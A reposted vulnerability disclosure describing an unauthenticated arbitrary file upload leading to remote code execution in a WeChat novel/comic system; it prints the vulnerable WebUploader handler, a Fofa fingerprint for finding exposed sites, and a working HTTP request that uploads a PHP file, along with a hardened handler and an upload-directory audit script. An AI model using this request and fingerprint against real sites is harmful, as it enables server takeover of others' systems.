WeChat Official Account Novel/Comic System: Unauthenticated Arbitrary File Upload (RCE)

admin · 2024-10-07 18:08:09 · 22 views · 5,715 characters · 19 min 3 s read


0x00 Preface

Source description: a fixed edition of the "Zhangshang Yuedu" (palm reading) novel source and WeChat Official Account comic source. It can be packaged as a comic app, supports Official Accounts and agent sub-sites, has a complete payment module, can be connected to WeChat Official Accounts and packaged as an APP, and supports payment collection through a personal WeChat account.

1. Added check-in, book-coin rewards for sharing the platform, and generation of novel promotion links, to improve promotion and user retention.

2. Added customizable middle and bottom navigation.

3. Added chapter advertisements to increase revenue.

4. Official Account menus, message push and custom replies can be managed.

5. Franchise sub-sites can be added, with agents and custom deduction ratios.

Fofa fingerprint: "/Public/home/mhjs/jquery.js"


Framework: ThinkPHP 3.2.3, Debug: True

0x01 Vulnerability Analysis & Reproduction

The file /webuploader/0.1.5/server/fileupload.php is the stock example upload handler shipped with WebUploader (derived from the Plupload example). It writes whatever is posted to disk under a name taken straight from the request (the `name` parameter or the multipart filename) with no extension, path or content check, and it is reachable without authentication, which is the root cause of the vulnerability.

```php
<?php
/**
 * upload.php
 *
 * Copyright 2013, Moxiecode Systems AB
 * Released under GPL License.
 *
 * License: http://www.plupload.com/license
 * Contributing: http://www.plupload.com/contributing
 */

#!! NOTE
#!! This file is only an example; do not use it in a real product.
#!! Code security is not guaranteed.
#!! IMPORTANT:
#!! this file is just an example, it doesn't incorporate any security checks and
#!! is not recommended to be used in production environment as it is. Be sure to
#!! revise it and customize to your needs.

// Make sure file is not cached (as it happens for example on iOS devices)
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

// Support CORS
// header("Access-Control-Allow-Origin: *");
// other CORS headers if any...
if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    exit; // finish preflight CORS requests here
}

//echo $_SERVER['REQUEST_METHOD']."hahahah";

if ( !empty($_REQUEST[ 'debug' ]) ) {
    $random = rand(0, intval($_REQUEST[ 'debug' ]) );
    if ( $random === 0 ) {
        header("HTTP/1.0 500 Internal Server Error");
        exit;
    }
}

// header("HTTP/1.0 500 Internal Server Error");
// exit;

// 5 minutes execution time
@set_time_limit(5 * 60);

// Uncomment this one to fake upload time
// usleep(5000);

// Settings
// $targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
$targetDir = 'upload_tmp';
$uploadDir = 'upload';

$cleanupTargetDir = true; // Remove old files
$maxFileAge = 5 * 3600; // Temp file age in seconds

// Create target dir
if (!file_exists($targetDir)) {
    @mkdir($targetDir);
}

// Create target dir
if (!file_exists($uploadDir)) {
    @mkdir($uploadDir);
}

// Get a file name
// Vulnerable: the name comes straight from the request (the "name" parameter
// or the multipart filename) with no path, extension or content check.
if (isset($_REQUEST["name"])) {
    $fileName = $_REQUEST["name"];
} elseif (!empty($_FILES)) {
    $fileName = $_FILES["file"]["name"];
} else {
    $fileName = uniqid("file_");
}

$filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName;
// Both directories are relative to this script, i.e. inside the web root.
$uploadPath = $uploadDir . DIRECTORY_SEPARATOR . $fileName;

// Chunking might be enabled
$chunk = isset($_REQUEST["chunk"]) ? intval($_REQUEST["chunk"]) : 0;
$chunks = isset($_REQUEST["chunks"]) ? intval($_REQUEST["chunks"]) : 1;

// Remove old temp files
if ($cleanupTargetDir) {
    if (!is_dir($targetDir) || !$dir = opendir($targetDir)) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 100, "message": "Failed to open temp directory."}, "id" : "id"}');
    }

    while (($file = readdir($dir)) !== false) {
        $tmpfilePath = $targetDir . DIRECTORY_SEPARATOR . $file;

        // If temp file is current file proceed to the next
        if ($tmpfilePath == "{$filePath}_{$chunk}.part" || $tmpfilePath == "{$filePath}_{$chunk}.parttmp") {
            continue;
        }

        // Remove temp file if it is older than the max age and is not the current file
        if (preg_match('/.(part|parttmp)$/', $file) && (@filemtime($tmpfilePath) < time() - $maxFileAge)) {
            @unlink($tmpfilePath);
        }
    }
    closedir($dir);
}

// Open temp file
if (!$out = @fopen("{$filePath}_{$chunk}.parttmp", "wb")) {
    die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
}

if (!empty($_FILES)) {
    if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."}, "id" : "id"}');
    }

    // Read binary input stream and append it to temp file
    if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
} else {
    // Without a multipart body the raw request body is accepted as the file.
    if (!$in = @fopen("php://input", "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
}

while ($buff = fread($in, 4096)) {
    fwrite($out, $buff);
}

@fclose($out);
@fclose($in);

rename("{$filePath}_{$chunk}.parttmp", "{$filePath}_{$chunk}.part");

$index = 0;
$done = true;
for( $index = 0; $index < $chunks; $index++ ) {
    if ( !file_exists("{$filePath}_{$index}.part") ) {
        $done = false;
        break;
    }
}
if ( $done ) {
    // Vulnerable: the assembled file is written under the web root with the
    // client-chosen name, so a .php upload becomes directly executable.
    if (!$out = @fopen($uploadPath, "wb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 102, "message": "Failed to open output stream."}, "id" : "id"}');
    }

    if ( flock($out, LOCK_EX) ) {
        for( $index = 0; $index < $chunks; $index++ ) {
            if (!$in = @fopen("{$filePath}_{$index}.part", "rb")) {
                break;
            }

            while ($buff = fread($in, 4096)) {
                fwrite($out, $buff);
            }

            @fclose($in);
            @unlink("{$filePath}_{$index}.part");
        }

        flock($out, LOCK_UN);
    }
    @fclose($out);
}

// Return Success JSON-RPC response
die('{"jsonrpc" : "2.0", "result" : null, "id" : "id"}');
```
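The following is an added example, not code from the post or from WebUploader/Plupload, showing how the name-handling and storage step of such a handler can be hardened: the client-supplied name is reduced to an allowlisted extension, the real content type is checked with `finfo` rather than the `Content-Type` the client sends, the stored name is chosen by the server, and the file is moved to a directory outside the web root. The function names (`allowedExtension`, `contentMatchesExtension`, `storeUpload`) and the path `/var/app/uploads` are assumptions made for the example.

```php
<?php
// Added example (not the project's code): hardened replacement for the
// filename/extension handling in webuploader's fileupload.php.
// Assumptions: uploads are meant to be images only; the upload directory is
// OUTSIDE the web root (hypothetical path below); CORS/chunking handled elsewhere.
declare(strict_types=1);

// Allowlist of extensions and the real MIME types accepted for each.
const ALLOWED_TYPES = [
    'jpg'  => ['image/jpeg'],
    'jpeg' => ['image/jpeg'],
    'png'  => ['image/png'],
    'gif'  => ['image/gif'],
];

/**
 * Reduce a client-supplied name to a single allowlisted extension, or null.
 * basename() strips directory components such as "../"; only the LAST
 * extension counts, and the client's base name is never reused on disk,
 * so a name like "1.php" can never land as "1.php".
 */
function allowedExtension(string $clientName): ?string
{
    $name = basename($clientName);
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_TYPES) ? $ext : null;
}

/**
 * Check the file's real content type with finfo (not the client-supplied
 * Content-Type header) and require it to match the extension.
 */
function contentMatchesExtension(string $path, string $ext): bool
{
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime = $finfo->file($path);
    return $mime !== false && in_array($mime, ALLOWED_TYPES[$ext], true);
}

/** Random, server-chosen storage name: the client never influences it. */
function storageName(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Validate and store one entry of $_FILES. Returns the stored file name or
 * throws RuntimeException on any failure.
 */
function storeUpload(array $file, string $uploadDir, int $maxBytes = 5 * 1024 * 1024): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed with error code ' . ($file['error'] ?? 'unknown'));
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > $maxBytes) {
        throw new RuntimeException('File too large');
    }

    $ext = allowedExtension($file['name']);
    if ($ext === null) {
        throw new RuntimeException('Extension not allowed');
    }
    if (!contentMatchesExtension($file['tmp_name'], $ext)) {
        throw new RuntimeException('Content does not match extension');
    }

    $target = $uploadDir . DIRECTORY_SEPARATOR . storageName($ext);
    // move_uploaded_file() refuses anything that was not a real upload.
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('Could not move file');
    }
    chmod($target, 0600); // owner read/write only, no execute bit
    return basename($target);
}

// Usage in the handler, replacing the "$fileName = $_REQUEST['name']" logic.
if (!empty($_FILES['file'])) {
    try {
        $stored = storeUpload($_FILES['file'], '/var/app/uploads'); // hypothetical path
        echo json_encode(['jsonrpc' => '2.0', 'result' => $stored, 'id' => 'id']);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['jsonrpc' => '2.0', 'error' => ['code' => 100, 'message' => $e->getMessage()], 'id' => 'id']);
    }
}
```

Two design points matter here beyond the code: the `name` request parameter, which the original handler lets override the multipart filename, is ignored entirely; and keeping the upload directory outside the document root means that even a file that slips through the checks is served, if at all, through a script that sets a fixed `Content-Type`, never executed by the PHP handler.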

Payload:

```http
POST /Public/webuploader/0.1.5/server/fileupload.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 197
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAW4kl2MUmkWNAgBW
Cookie: PHPSESSID=bf13e78oe1uqp8nh3crld1gu55; curIndex=3; uloginid=586639
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/Public/webuploader/0.1.5/server/fileupload.php
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1

------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/jpeg

<?php phpinfo();?>
------WebKitFormBoundary03rNBzFMIytvpWhy--
```

The uploaded file lands at /Public/webuploader/0.1.5/server/upload/1.php, inside the web root, where it is executed on request.
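Because the handler writes into a web-served `upload` directory, an operator who finds this handler exposed should also check whether the directory already holds files that do not belong there. The script below is an added example, not from the post or from WebUploader, that walks an upload directory and flags files with an executable extension, files containing a PHP open tag, and files whose image extension does not match their real content. The function name `findSuspiciousFiles` and the extension lists are assumptions made for the example.

```php
<?php
// Added example, not part of the original post or of webuploader: audit an
// upload directory for files that should never be there. Run from the CLI:
//   php audit_uploads.php /path/to/Public/webuploader/0.1.5/server/upload
declare(strict_types=1);

// Extensions a typical PHP web server may execute (assumed list; adjust to
// the handler mapping actually configured on the server).
const EXECUTABLE_EXTS = ['php', 'phtml', 'php3', 'php4', 'php5', 'php7', 'phar', 'inc'];
const IMAGE_EXTS = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

/**
 * Walk $dir recursively and return [path => [reason, ...]] for every file that
 * has an executable extension, contains a PHP open tag, or claims an image
 * extension while its real content is not an image.
 */
function findSuspiciousFiles(string $dir): array
{
    $findings = [];
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $iter = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );

    foreach ($iter as $info) {
        if (!$info->isFile()) {
            continue;
        }
        $path = $info->getPathname();
        $ext = strtolower($info->getExtension());
        $reasons = [];

        if (in_array($ext, EXECUTABLE_EXTS, true)) {
            $reasons[] = 'executable extension';
        }

        // The first 4 KiB is enough to spot an open tag at the start of a dropped file.
        $head = (string) file_get_contents($path, false, null, 0, 4096);
        if (strpos($head, '<?php') !== false || strpos($head, '<?=') !== false) {
            $reasons[] = 'contains PHP open tag';
        }

        // Compare the claimed image extension with the real content type.
        $mime = $finfo->file($path) ?: 'unknown';
        if (in_array($ext, IMAGE_EXTS, true) && strpos($mime, 'image/') !== 0) {
            $reasons[] = "image extension but content is $mime";
        }

        if ($reasons !== []) {
            $findings[$path] = $reasons;
        }
    }
    return $findings;
}

// CLI entry point: one line per finding, exit status 1 if anything was found.
if (PHP_SAPI === 'cli' && isset($argv[1])) {
    $findings = findSuspiciousFiles($argv[1]);
    foreach ($findings as $path => $reasons) {
        echo $path, ': ', implode('; ', $reasons), PHP_EOL;
    }
    exit($findings === [] ? 0 : 1);
}
```

A hit from this script is a reason to treat the host as compromised and preserve the file and the web server access log for the corresponding POST before cleaning up. As a complementary control, the web server should be configured not to pass files in upload directories to the PHP handler at all, so that a file which slips through application checks is still served as static content rather than executed.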

Tags: code audit, 0day, penetration testing, system, generic, 0day, Xianyu, Zhuanzhuan


Disclaimer: the programs (methods) involved in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; the author and this Official Account bear no legal or joint liability. Please take note!!!

Originally published on the WeChat Official Account 星悦安全 (Xingyue Security): 微信公众号小说漫画系统存在前台任意文件上传漏洞(RCE)

Posted by admin on 2024-10-07 18:08:09. Reposted from CN-SEC (please keep this link when reposting): https://cn-sec.com/archives/3237607.html
